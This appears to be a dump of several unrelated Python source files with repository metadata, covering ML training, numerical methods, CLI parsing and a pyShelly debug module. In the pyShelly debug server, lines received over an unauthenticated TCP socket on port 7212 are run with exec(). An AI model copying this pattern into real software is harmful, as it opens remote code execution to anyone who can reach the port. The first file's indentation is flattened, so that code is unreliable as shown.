80b86b5b3f92ef28102ac0f5049bb495b5cc07f9
|
[
"Apache-2.0"
] | null | null | null |
# Fix number of node predicates at 1 out of 6
# this ensures queries with larger space of possible nodes
# The number of colors in a query is varied from 1 to 5
import argparse
import numpy as np
from graph_gen import birth_years, genders, num_posts, num_friends
possibilities = [1, 3, 4, 5]
# do not consider equality, as it would narrow down
# extreme node sets too much
op1 = ["<=", "<", ">", ">="]
op2 = ["==", "!="]
def construct_predicate():
# attribute 2 & 6 should never be considered
orig_query = ["__"] * 6
# num_preds = np.random.choice([0, 1, 2, 3])
num_preds = 3
selected_predicates = np.random.choice(possibilities, num_preds, replace=False)
for predicate in selected_predicates:
query = ""
if predicate == 1:
# birth_year
op_value = np.random.choice(birth_years)
op = np.random.choice(op1)
query += str(op)
query += str(op_value)
elif predicate == 3:
# sex
op_value = np.random.choice(genders)
op = np.random.choice(op2)
query += str(op)
query += str(op_value)
elif predicate == 4:
# posts
op_value = np.random.choice(num_posts)
op = np.random.choice(op1)
query += str(op)
query += str(op_value)
elif predicate == 5:
# friends
op_value = np.random.choice(num_friends)
op = np.random.choice(op1)
query += str(op)
query += str(op_value)
orig_query[predicate - 1] = query
return "".join(orig_query)
def construct_regex():
colors = ['a', 'b', 'c', 'd', 'e', 'f']
# some parameters to fix for queries
max_colors = 4
max_len = 8
ops = ["", "<="]
# reg_len = np.random.randint(1, max_colors + 1)
reg_len = 3
np.random.shuffle(colors)
regex = ""
for color in colors[:reg_len]:
regex += color
        op = np.random.choice(ops)
        regex += op
        if op == "<=":
            regex += str(np.random.randint(2, max_len + 1))
return regex
def construct_query():
pred1 = construct_predicate()
pred2 = construct_predicate()
regex = construct_regex()
return pred1 + " " + pred2 + " " + regex
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--Q", type=int, default=10)
args = parser.parse_args()
print(args.Q)
for i in range(args.Q):
print(construct_query())
if __name__ == "__main__":
main()
| 27.83871
| 83
| 0.565469
| 332
| 2,589
| 4.259036
| 0.358434
| 0.079208
| 0.108911
| 0.056577
| 0.202263
| 0.17256
| 0.138614
| 0.138614
| 0.138614
| 0.11174
| 0
| 0.022384
| 0.309772
| 2,589
| 92
| 84
| 28.141304
| 0.768886
| 0.164156
| 0
| 0.2
| 0
| 0
| 0.016279
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061538
| false
| 0
| 0.046154
| 0
| 0.153846
| 0.030769
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afb5ce60435e8b3c83936754903becf1fcb4fbdf
| 1,292
|
py
|
Python
|
communication/templatetags/discussion.py
|
stewardshiptools/stewardshiptools
|
ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e
|
[
"MIT"
] | null | null | null |
communication/templatetags/discussion.py
|
stewardshiptools/stewardshiptools
|
ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e
|
[
"MIT"
] | 11
|
2020-03-24T15:29:46.000Z
|
2022-03-11T23:14:48.000Z
|
communication/templatetags/discussion.py
|
stewardshiptools/stewardshiptools
|
ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e
|
[
"MIT"
] | null | null | null |
import string
from django.template import Context
from django.template.loader import get_template
from django import template
register = template.Library()
import crm
@register.inclusion_tag('comments/form.html')
def render_cedar_comment_form(**kwargs):
object = kwargs.pop('object', None)
parent_id = kwargs.pop('parent_id', None) # id of parent comment
if object is None:
raise AssertionError("object kwarg cannot be None")
else:
return {
'object': object,
'parent_id': parent_id
}
#
# response = {
# 'element_id': kwargs.pop('element_id', None),
# 'data': data,
# 'related_object': related_object,
# 'include_toolbar': kwargs.pop('include_toolbar', True)
# }
return response
# @register.filter
# def render_related_communication_items(related_object):
# '''
# Called by the CommunicationViewset
# to render data if html is requested.
# :param related_object:
# :return: rendered communication items list (<ul>)
# '''
# comms_objects = Communication.get_communications_related_to(related_object)
# context = Context({'data': comms_objects})
# t = get_template("communication/communication_items.html")
# return t.render(context)
| 28.711111
| 81
| 0.670279
| 147
| 1,292
| 5.70068
| 0.408163
| 0.077566
| 0.042959
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.220588
| 1,292
| 44
| 82
| 29.363636
| 0.832175
| 0.517802
| 0
| 0
| 0
| 0
| 0.124585
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 1
| 0.055556
| false
| 0
| 0.277778
| 0
| 0.444444
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afb6bce0846f3ad5fdbe2619d6c7b2dd5348269a
| 3,504
|
py
|
Python
|
fairseq/criterions/cross_entropy.py
|
emailandxu/KUST-Fairseq-ST
|
95316cebc99d963c4aa671914ce219c5692f5fd6
|
[
"BSD-3-Clause"
] | null | null | null |
fairseq/criterions/cross_entropy.py
|
emailandxu/KUST-Fairseq-ST
|
95316cebc99d963c4aa671914ce219c5692f5fd6
|
[
"BSD-3-Clause"
] | null | null | null |
fairseq/criterions/cross_entropy.py
|
emailandxu/KUST-Fairseq-ST
|
95316cebc99d963c4aa671914ce219c5692f5fd6
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.
import math
import torch
import torch.nn.functional as F
from fairseq import utils
from . import FairseqCriterion, register_criterion
@register_criterion('cross_entropy')
class CrossEntropyCriterion(FairseqCriterion):
def __init__(self, args, task):
super().__init__(args, task)
self.task = task
def forward(self, model, sample, reduce=True):
"""Compute the loss for the given sample.
Returns a tuple with three elements:
1) the loss
2) the sample size, which is used as the denominator for the gradient
3) logging outputs to display while training
"""
# import pdb
# pdb.set_trace()
net_output = model(**sample['net_input'])
lprobs = model.get_normalized_probs(net_output, log_probs=True)
lprobs = lprobs.view(-1, lprobs.size(-1))
target = model.get_targets(sample, net_output).view(-1)
loss = F.nll_loss(lprobs, target, size_average=False, ignore_index=self.padding_idx,
reduce=reduce)
sample_size = sample['target'].size(0) if self.args.sentence_avg else sample['ntokens']
logging_output = {
'loss': utils.item(loss.data) if reduce else loss.data,
'ntokens': sample['ntokens'],
'nsentences': sample['target'].size(0),
'sample_size': sample_size,
}
        # Debug inspection: greedy (argmax) decoding of the model's run-time output distribution into target-language sequences
# tgt = sample['target']
# hypo = torch.max(lprobs,1)[1].reshape(*tgt.shape)
# print(tgt, hypo, sep="\n")
# tgt_str = self.task.tgt_dict.string(tgt, True, escape_unk=True)
# hypo_str = self.task.tgt_dict.string(hypo, True, escape_unk=True)
# pre_str = self.task.tgt_dict.string(sample['net_input']['prev_output_tokens'], True, escape_unk=True)
# for t,h,p in zip(tgt_str.split("\n"),hypo_str.split("\n"),pre_str.split("\n")):
# print(f"T: {t}")
# print(f"H: {h}")
# print(f"P: {p}")
# print("-"*20)
# from fairseq.sequence_generator import SequenceGenerator
# translator = SequenceGenerator(
# [model], self.task.target_dictionary, beam_size=5)
# print("-"*20, "by sequence generator", "-"*20)
# print(translator.generate_by_a_sample(sample))
# import pdb
# pdb.set_trace()
return loss, sample_size, logging_output
@staticmethod
def aggregate_logging_outputs(logging_outputs):
"""Aggregate logging outputs from data parallel training."""
loss_sum = sum(log.get('loss', 0) for log in logging_outputs)
ntokens = sum(log.get('ntokens', 0) for log in logging_outputs)
nsentences = sum(log.get('nsentences', 0) for log in logging_outputs)
sample_size = sum(log.get('sample_size', 0) for log in logging_outputs)
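        # Dividing by math.log(2) converts the summed natural-log NLL to bits.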
agg_output = {
'loss': loss_sum / sample_size / math.log(2),
'ntokens': ntokens,
'nsentences': nsentences,
'sample_size': sample_size,
}
if sample_size != ntokens:
agg_output['nll_loss'] = loss_sum / ntokens / math.log(2)
return agg_output
| 37.276596
| 111
| 0.623002
| 447
| 3,504
| 4.720358
| 0.342282
| 0.052133
| 0.017062
| 0.017062
| 0.096682
| 0.077725
| 0
| 0
| 0
| 0
| 0
| 0.010413
| 0.259989
| 3,504
| 93
| 112
| 37.677419
| 0.803317
| 0.384703
| 0
| 0.05
| 0
| 0
| 0.073147
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075
| false
| 0
| 0.125
| 0
| 0.275
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afbb87c6ab776c79d599ae4c17e47909e935b3eb
| 3,845
|
py
|
Python
|
Year-2/Computational-math/src/labs/lab_2/methods.py
|
zubrailx/University-ITMO
|
9c746ab6cfa95ecd6ff02eb23e1f49c93337ec61
|
[
"MIT"
] | 3
|
2021-10-13T05:01:37.000Z
|
2022-01-21T15:25:47.000Z
|
Year-2/Computational-math/src/labs/lab_2/methods.py
|
zubrailx/university
|
9c746ab6cfa95ecd6ff02eb23e1f49c93337ec61
|
[
"MIT"
] | null | null | null |
Year-2/Computational-math/src/labs/lab_2/methods.py
|
zubrailx/university
|
9c746ab6cfa95ecd6ff02eb23e1f49c93337ec61
|
[
"MIT"
] | null | null | null |
from copy import copy
from modules.parse import parse
from modules.equation import grad, node_flatten
from modules.matrix import Matrix
from modules.util import ProjectException
from modules.util import Color, color_string
def split_half(data: dict) -> dict:
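    # Bisection: repeatedly halve [range_min, range_max], keeping the half
    # whose endpoint values have opposite signs.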
node_root = data["equation"][0]
var_list = data["var_list"]
if (len(var_list) != 1):
raise ProjectException(color_string(Color.RED, "ERROR >> Amount of variables should be equal to 1"))
try:
range_min = data["data"]["range_min"]
range_max = data["data"]["range_max"]
iterations = data["data"]["iterations"]
except KeyError:
raise ProjectException(color_string(Color.RED,
"Key not found!(should be present range_min, range_max, iterations)"))
fval_range_min = node_root.calculate({var_list[0]: range_min})
fval_range_max = node_root.calculate({var_list[0]: range_max})
if (sum([fval_range_min > 0, fval_range_max > 0]) != 1):
return {"error": "Invalid arguments. Function values of borders are same sigh"}
for _ in range(iterations):
range_med = (range_max + range_min) / 2
fval_range_med = node_root.calculate({var_list[0]: range_med})
if (sum([fval_range_med > 0, fval_range_min > 0]) == 1):
range_max = range_med
else:
range_min = range_med
return {"result": {"range_min": range_min, "range_max": range_max}}
def tangent(data: dict) -> dict:
node = data["equation"][0]
var_list = data["var_list"]
if (len(var_list) != 1):
raise ProjectException(color_string(Color.RED, "ERROR >> Amount of variables should be equal to 1"))
try:
x_0 = data["data"]["x_0"]
iterations = data["data"]["iterations"]
except KeyError:
raise ProjectException(color_string(Color.RED, "Key not found!(should be present x_0)"))
f = node.calculate({var_list[0]: x_0})
f_ll = grad(grad(node_flatten(node, {"x": x_0}, "x")))(x_0)
if (f * f_ll <= 0):
return {"error": "Invalid arguments. Derivative'' * func <= 0. Iteration process doesn't converge"}
x_prev = x_0
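    # Newton's (tangent) iteration: x_{k+1} = x_k - f(x_k) / f'(x_k)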
for _ in range(iterations):
f_x = node.calculate({var_list[0]: x_prev})
f_x_l = grad(node_flatten(node, {"x": x_prev}, "x"))(x_prev)
x_prev -= f_x / f_x_l
return {"result": x_prev}
def simple_iteration(data: dict) -> dict:
node_list = data["parse"]
equation_list = []
    for i in range(len(node_list)):
equation_list.append(str(node_list[i]))
node_list = []
try:
iterations = data["data"]["iterations"]
x0_dict = data["data"]["x_0"]
except KeyError:
raise ProjectException(color_string(Color.RED, "Key not found!(should be present x_0)"))
x0_dict_keys = list(x0_dict.keys())
assert(len(x0_dict_keys) == len(equation_list))
for i in range(len(equation_list)):
equation_list[i] = "-1 * (" + equation_list[i] + "-" + x0_dict_keys[i] + ")"
n, v = parse.parse_expression(equation_list[i])
node_list.append(n)
matrix_phi = Matrix(len(equation_list), len(x0_dict_keys))
# check convergence
for i in range(matrix_phi.rows):
for j in range(matrix_phi.columns):
matrix_phi[i][j] = grad(node_flatten(node_list[i], x0_dict, x0_dict_keys[j]))(x0_dict[x0_dict_keys[j]])
norm = max([sum([matrix_phi[i][j] for j in range(matrix_phi.columns)]) for i in range(matrix_phi.rows)])
if (norm >= 1):
return {"error" : "This equations for those basic arguments are not convergent"}
x0_dict_prev = copy(x0_dict)
for _ in range(iterations):
for i in range(len(node_list)):
x0_dict[x0_dict_keys[i]] = node_list[i].calculate(x0_dict_prev)
x0_dict_prev = copy(x0_dict)
return {"values": x0_dict_prev}
| 40.904255
| 115
| 0.640312
| 564
| 3,845
| 4.117021
| 0.177305
| 0.046512
| 0.034453
| 0.068906
| 0.422481
| 0.408269
| 0.319552
| 0.236865
| 0.236865
| 0.236865
| 0
| 0.016399
| 0.222887
| 3,845
| 93
| 116
| 41.344086
| 0.76071
| 0.004421
| 0
| 0.275
| 0
| 0
| 0.161265
| 0
| 0
| 0
| 0
| 0
| 0.0125
| 1
| 0.0375
| false
| 0
| 0.075
| 0
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afbc104c7579cd278f56fcd197e11d8c1c44ade6
| 1,807
|
py
|
Python
|
TerraformToAnsibleInventory/args.py
|
mrlesmithjr/python-terraform-to-ansible-inventory
|
0ceb251c8fbdcf23d186f1a1d66684af1b28c86c
|
[
"MIT"
] | 5
|
2018-07-17T15:46:57.000Z
|
2020-01-18T23:54:23.000Z
|
TerraformToAnsibleInventory/args.py
|
mrlesmithjr/python-terraform-to-ansible-inventory
|
0ceb251c8fbdcf23d186f1a1d66684af1b28c86c
|
[
"MIT"
] | 11
|
2018-07-19T13:04:50.000Z
|
2019-10-22T13:38:01.000Z
|
TerraformToAnsibleInventory/args.py
|
mrlesmithjr/python-terraform-to-ansible-inventory
|
0ceb251c8fbdcf23d186f1a1d66684af1b28c86c
|
[
"MIT"
] | 4
|
2019-09-27T18:27:17.000Z
|
2021-12-22T13:41:03.000Z
|
import argparse
from _version import __version__
def parse():
"""Parse command line arguments."""
PARSER = argparse.ArgumentParser()
PARSER.add_argument('-b', '--backend',
help='Define which Terraform backend to parse',
choices=['local', 'consul'], default='local')
PARSER.add_argument('-cH', '--consulHost',
help='Define Consul host when using Consul backend')
PARSER.add_argument('-cKV', '--consulKV',
help='Define Consul KV Pair to query. Ex. Azure/Test')
PARSER.add_argument('-cP', '--consulPort',
help='Define Consul host port', default='8500')
PARSER.add_argument('-cS', '--consulScheme',
help='Define Consul connection scheme.',
choices=['http', 'https'], default='http')
PARSER.add_argument('-i', '--inventory', help='Ansible inventory',
default='./terraform_inventory.yml')
PARSER.add_argument('--logLevel', help='Define logging level output',
choices=['CRITICAL', 'ERROR', 'WARNING',
'INFO', 'DEBUG'], default='INFO')
    PARSER.add_argument('-t', '--tfstate', help='Terraform tfstate file',
default='./terraform.tfstate')
PARSER.add_argument('-v', '--version', action='version',
version='%(prog)s {version}'.format(version=__version__))
ARGS = PARSER.parse_args()
if ARGS.backend == 'consul' and ARGS.consulHost is None:
PARSER.error('Consul host is required when using Consul backend.')
if ARGS.backend == 'consul' and ARGS.consulKV is None:
PARSER.error('Consul KV pair is required when using Consul backend')
return ARGS
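# Hedged usage note: parse() consumes CLI flags such as
#   -b consul -cH consul.example.com -cKV Azure/Test
# (the host and KV path above are hypothetical placeholders).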
| 51.628571
| 81
| 0.58052
| 187
| 1,807
| 5.502674
| 0.406417
| 0.078717
| 0.148688
| 0.06414
| 0.157434
| 0.112731
| 0
| 0
| 0
| 0
| 0
| 0.003063
| 0.277255
| 1,807
| 34
| 82
| 53.147059
| 0.784839
| 0.016049
| 0
| 0
| 0
| 0
| 0.348194
| 0.014108
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032258
| false
| 0
| 0.064516
| 0
| 0.129032
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afbcd4f337d7fb85d3b0e527567a1d3d85e5d0ed
| 1,928
|
py
|
Python
|
test.py
|
raveendezoysa/American-Sign-Language-to-Text-Based-Translator
|
0e0d3bea9912c87c51f00728742dc67cd85b7e66
|
[
"MIT"
] | null | null | null |
test.py
|
raveendezoysa/American-Sign-Language-to-Text-Based-Translator
|
0e0d3bea9912c87c51f00728742dc67cd85b7e66
|
[
"MIT"
] | null | null | null |
test.py
|
raveendezoysa/American-Sign-Language-to-Text-Based-Translator
|
0e0d3bea9912c87c51f00728742dc67cd85b7e66
|
[
"MIT"
] | null | null | null |
# importing libraries
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D
from keras.layers import Activation, Dropout, Flatten, Dense
from keras import backend as K
img_width, img_height = 224, 224
train_data_dir = 'v_data/train'
validation_data_dir = 'v_data/test'
nb_train_samples = 400
nb_validation_samples = 100
epochs = 10
batch_size = 16
if K.image_data_format() == 'channels_first':
input_shape = (3, img_width, img_height)
else:
input_shape = (img_width, img_height, 3)
model = Sequential()
model.add(Conv2D(32, (2, 2), input_shape=input_shape))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(32, (2, 2)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (2, 2)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(64))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
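# A single sigmoid unit trained with binary_crossentropy makes this a
# two-class classifier; the class labels come from the sub-directory names
# read by flow_from_directory below.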
train_datagen = ImageDataGenerator(
rescale=1. / 255,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
test_datagen = ImageDataGenerator(rescale=1. / 255)
train_generator = train_datagen.flow_from_directory(train_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size, class_mode='binary')
validation_generator = test_datagen.flow_from_directory(
validation_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size, class_mode ='binary')
model.fit_generator(train_generator,
steps_per_epoch=nb_train_samples // batch_size,
epochs=epochs, validation_data=validation_generator,
validation_steps=nb_validation_samples // batch_size)
model.save_weights('model_saved.h5')
| 27.542857
| 67
| 0.761411
| 277
| 1,928
| 5.039711
| 0.3213
| 0.08596
| 0.039398
| 0.060888
| 0.323782
| 0.272206
| 0.23639
| 0.23639
| 0.23639
| 0.23639
| 0
| 0.036173
| 0.110996
| 1,928
| 69
| 68
| 27.942029
| 0.778296
| 0.009855
| 0
| 0.207547
| 0
| 0
| 0.062926
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.09434
| 0
| 0.09434
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afbe04768d0e6a472f75c12cbd235fcaf4b5e777
| 2,113
|
py
|
Python
|
intersimple-expert-rollout-setobs2.py
|
sisl/InteractionImitation
|
9c9ee8f21b53e71bbca86b0b79c6e6d913a20567
|
[
"MIT"
] | 2
|
2022-03-13T19:43:08.000Z
|
2022-03-14T03:19:33.000Z
|
intersimple-expert-rollout-setobs2.py
|
sisl/InteractionImitation
|
9c9ee8f21b53e71bbca86b0b79c6e6d913a20567
|
[
"MIT"
] | null | null | null |
intersimple-expert-rollout-setobs2.py
|
sisl/InteractionImitation
|
9c9ee8f21b53e71bbca86b0b79c6e6d913a20567
|
[
"MIT"
] | null | null | null |
import torch
import functools
from src.core.sampling import rollout_sb3
from intersim.envs import IntersimpleLidarFlatIncrementingAgent
from intersim.envs.intersimple import speed_reward
from intersim.expert import NormalizedIntersimpleExpert
from src.util.wrappers import CollisionPenaltyWrapper, Setobs
import numpy as np
from gym.wrappers import TransformObservation
obs_min = np.array([
[-1000, -1000, 0, -np.pi, -1e-1, 0.],
[0, -np.pi, -20, -20, -np.pi, -1e-1],
[0, -np.pi, -20, -20, -np.pi, -1e-1],
[0, -np.pi, -20, -20, -np.pi, -1e-1],
[0, -np.pi, -20, -20, -np.pi, -1e-1],
[0, -np.pi, -20, -20, -np.pi, -1e-1],
]).reshape(-1)
obs_max = np.array([
[1000, 1000, 20, np.pi, 1e-1, 0.],
[50, np.pi, 20, 20, np.pi, 1e-1],
[50, np.pi, 20, 20, np.pi, 1e-1],
[50, np.pi, 20, 20, np.pi, 1e-1],
[50, np.pi, 20, 20, np.pi, 1e-1],
[50, np.pi, 20, 20, np.pi, 1e-1],
]).reshape(-1)
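# Per-feature bounds used below to min-max normalize observations into [0, 1];
# the 1e-10 in the TransformObservation lambda guards against division by zero.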
def main(track:int, loc:int=0):
env = IntersimpleLidarFlatIncrementingAgent(
loc=loc,
track=track,
n_rays=5,
reward=functools.partial(
speed_reward,
collision_penalty=0
),
)
policy = NormalizedIntersimpleExpert(env, mu=0.001)
env = Setobs(TransformObservation(
CollisionPenaltyWrapper(
env,
collision_distance=6, collision_penalty=100
), lambda obs: (obs - obs_min) / (obs_max - obs_min + 1e-10)
))
print(env.nv, 'vehicles')
expert_data = rollout_sb3(env, policy, n_episodes=150, max_steps_per_episode=200)
states, actions, rewards, dones = expert_data
print(f'Expert mean episode length {(~dones).sum() / states.shape[0]}')
print(f'Expert mean reward per episode {rewards[~dones].sum() / states.shape[0]}')
    print('Observation mean', states[~dones].mean(0))
    print('Observation std', states[~dones].std(0))
torch.save(expert_data, f'intersimple-expert-data-setobs2-loc{loc}-track{track}.pt')
def loop(tracks:list=[0]):
for track in tracks:
main(track)
if __name__=='__main__':
import fire
fire.Fire(loop)
| 32.507692
| 88
| 0.630857
| 311
| 2,113
| 4.196141
| 0.289389
| 0.067433
| 0.055172
| 0.064368
| 0.192337
| 0.186207
| 0.178544
| 0.138697
| 0.138697
| 0.138697
| 0
| 0.077335
| 0.204449
| 2,113
| 65
| 89
| 32.507692
| 0.698989
| 0
| 0
| 0.214286
| 0
| 0
| 0.111637
| 0.036897
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.178571
| 0
| 0.214286
| 0.089286
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afbe9673b618fa0388c83b7abcd87db09f9c7dda
| 2,840
|
py
|
Python
|
FeatureTransformation/UserInputFeatureScalling.py
|
Himanshu14k/AdultIncomePrediction_Project
|
522f170111c5e6e45ef1e26ef21f86f4ea3a8dcc
|
[
"MIT"
] | 2
|
2021-09-06T08:31:46.000Z
|
2021-10-30T12:53:21.000Z
|
FeatureTransformation/UserInputFeatureScalling.py
|
Himanshu14k/AdultIncomePrediction_Project
|
522f170111c5e6e45ef1e26ef21f86f4ea3a8dcc
|
[
"MIT"
] | 1
|
2021-09-07T13:53:26.000Z
|
2021-09-07T13:53:26.000Z
|
FeatureTransformation/UserInputFeatureScalling.py
|
Himanshu14k/AdultIncomePrediction_Project
|
522f170111c5e6e45ef1e26ef21f86f4ea3a8dcc
|
[
"MIT"
] | 2
|
2021-09-13T17:20:56.000Z
|
2021-11-21T16:05:16.000Z
|
from pandas import DataFrame
import pickle
class FeatureScaling:
def __init__(self, user_input, logger_obj, file_obj):
try:
self.logger_obj = logger_obj
self.file_obj = file_obj
self.logger_obj.log("INFO", 'Different user input value assign process started')
self.user_input = user_input
self.Education = self.user_input['Education']
self.logger_obj.log("INFO", 'stated done')
self.Workclass = self.user_input['Workclass']
self.Age = self.user_input['Age']
self.Martial_Status = self.user_input['Martial_Status']
self.Occupation = self.user_input['Occupation']
self.Relationship = self.user_input['Relationship']
self.Race = self.user_input['Race']
self.Sex = self.user_input['Sex']
self.Final_Weight = self.user_input['Final_Weight']
self.Capital_Gain = self.user_input['Capital_Gain']
self.Capital_Loss = self.user_input['Capital_Loss']
self.Hours_Per_Week = self.user_input['Hours_Per_Week']
self.Country = self.user_input['Country']
self.X = [[self.Sex, self.Age, self.Final_Weight,
self.Education, self.Capital_Gain, self.Capital_Loss,
self.Hours_Per_Week, self.Workclass, self.Martial_Status, self.Occupation,
self.Relationship, self.Race, self.Country]]
self.logger_obj.log("INFO", 'Different user input value assign process Finished')
except Exception as e:
self.logger_obj.log('INFO',"Exception Occurred during variable creation of user input to store scale data in dictionary format! Exception Message: " + str(e))
self.logger_obj.log('INFO',"Process to create variable and store user input in that variable failed.")
def Scaling(self):
"""
:DESC: This Function takes data provided by user and performs Feature Scaling.
It uses two files scale.pickle File
:return: Sends Data to perform model testing.
"""
try:
self.logger_obj.log("INFO", 'Feature Scaling process started')
self.X = DataFrame(self.X)
sc = pickle.load(open("FeatureTransformation/scale.pickle", "rb"))
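            # Column 0 holds Sex; only columns 1: go through the fitted scaler
            # (presumably Sex is already encoded numerically upstream - an
            # assumption, not stated in this file).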
self.X.iloc[:, 1:] = sc.transform(self.X.iloc[:, 1:])
self.logger_obj.log("INFO", 'Feature scaling process successfully executed!')
return self.X
except Exception as e:
self.logger_obj.log('INFO',"Exception Occurred during Process of Feature Scaling! Exception Message: " + str(e))
self.logger_obj.log('INFO',"Process of Feature scaling Failed. Exited from Scaling function of FeatureScalling class")
| 53.584906
| 171
| 0.633099
| 349
| 2,840
| 5
| 0.280802
| 0.103152
| 0.111748
| 0.082521
| 0.343266
| 0.296275
| 0.270487
| 0.234957
| 0.187966
| 0.187966
| 0
| 0.00096
| 0.266197
| 2,840
| 53
| 172
| 53.584906
| 0.836372
| 0.058803
| 0
| 0.093023
| 0
| 0
| 0.280367
| 0.012987
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046512
| false
| 0
| 0.069767
| 0
| 0.162791
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afbeec327d96ab2c12353a666a3a203a3a3bf18e
| 4,073
|
py
|
Python
|
pyShelly/debug.py
|
rfvermut/pyShelly
|
c2f27ef14d1eaf94c403858a898a919d0005d639
|
[
"MIT"
] | 39
|
2019-03-19T11:09:26.000Z
|
2022-03-19T12:44:47.000Z
|
pyShelly/debug.py
|
rfvermut/pyShelly
|
c2f27ef14d1eaf94c403858a898a919d0005d639
|
[
"MIT"
] | 34
|
2019-05-21T18:41:18.000Z
|
2022-03-27T07:30:49.000Z
|
pyShelly/debug.py
|
rfvermut/pyShelly
|
c2f27ef14d1eaf94c403858a898a919d0005d639
|
[
"MIT"
] | 42
|
2019-03-28T15:18:59.000Z
|
2021-12-27T19:16:44.000Z
|
import socket
import threading
import json
import sys
from io import StringIO
from .loop import Loop
from .const import (
LOGGER
)
class Debug_connection(Loop):
def __init__(self, parent, connection, client_address):
super(Debug_connection, self).__init__("Debug connection", parent._root)
self._debug_server = parent
self._connection = connection
self._client_address = client_address
self.state = 0
self.cmd = ''
self._locals = {'root':self._debug_server._root}
self._globals = {}
self.start_loop()
def loop_stopped(self):
try:
self._connection.close()
except:
pass
try:
            self._debug_server._connections.remove(self)
except:
pass
def loop(self):
if self.state == 0:
self._connection.send(b"> ")
self.state = 1
if self.state == 1:
try:
char = self._connection.recv(1).decode()
            except socket.timeout:
                return  # nothing received yet; retry on the next loop pass
            except:
                LOGGER.exception("Error receiving debug command")
                self.stop_loop()
                return
if char in ['\r', '\n']:
if not self.cmd:
return
elif self.cmd == 'exit':
self.stop_loop()
else:
old_stdout = sys.stdout
redirected_output = sys.stdout = StringIO()
try:
exec(self.cmd, self._globals, self._locals)
res = redirected_output.getvalue()
self._connection.send(res.encode() + b"\r\n")
except Exception as ex:
self._connection.send(str(ex).encode() + b"\r\n")
finally:
sys.stdout = old_stdout
self.cmd = ''
self.state = 0
else:
self.cmd += char
class Debug_server(Loop):
def __init__(self, root):
super(Debug_server, self).__init__("Debug server", root)
self._root = root
self._socket = None
self._connections = []
self.start_loop()
def loop_started(self):
self._init_socket()
def _init_socket(self):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((self._root.bind_ip, 7212))
sock.listen(1)
self._socket = sock
def loop(self):
# Wait for a connection
connection, client_address = self._socket.accept()
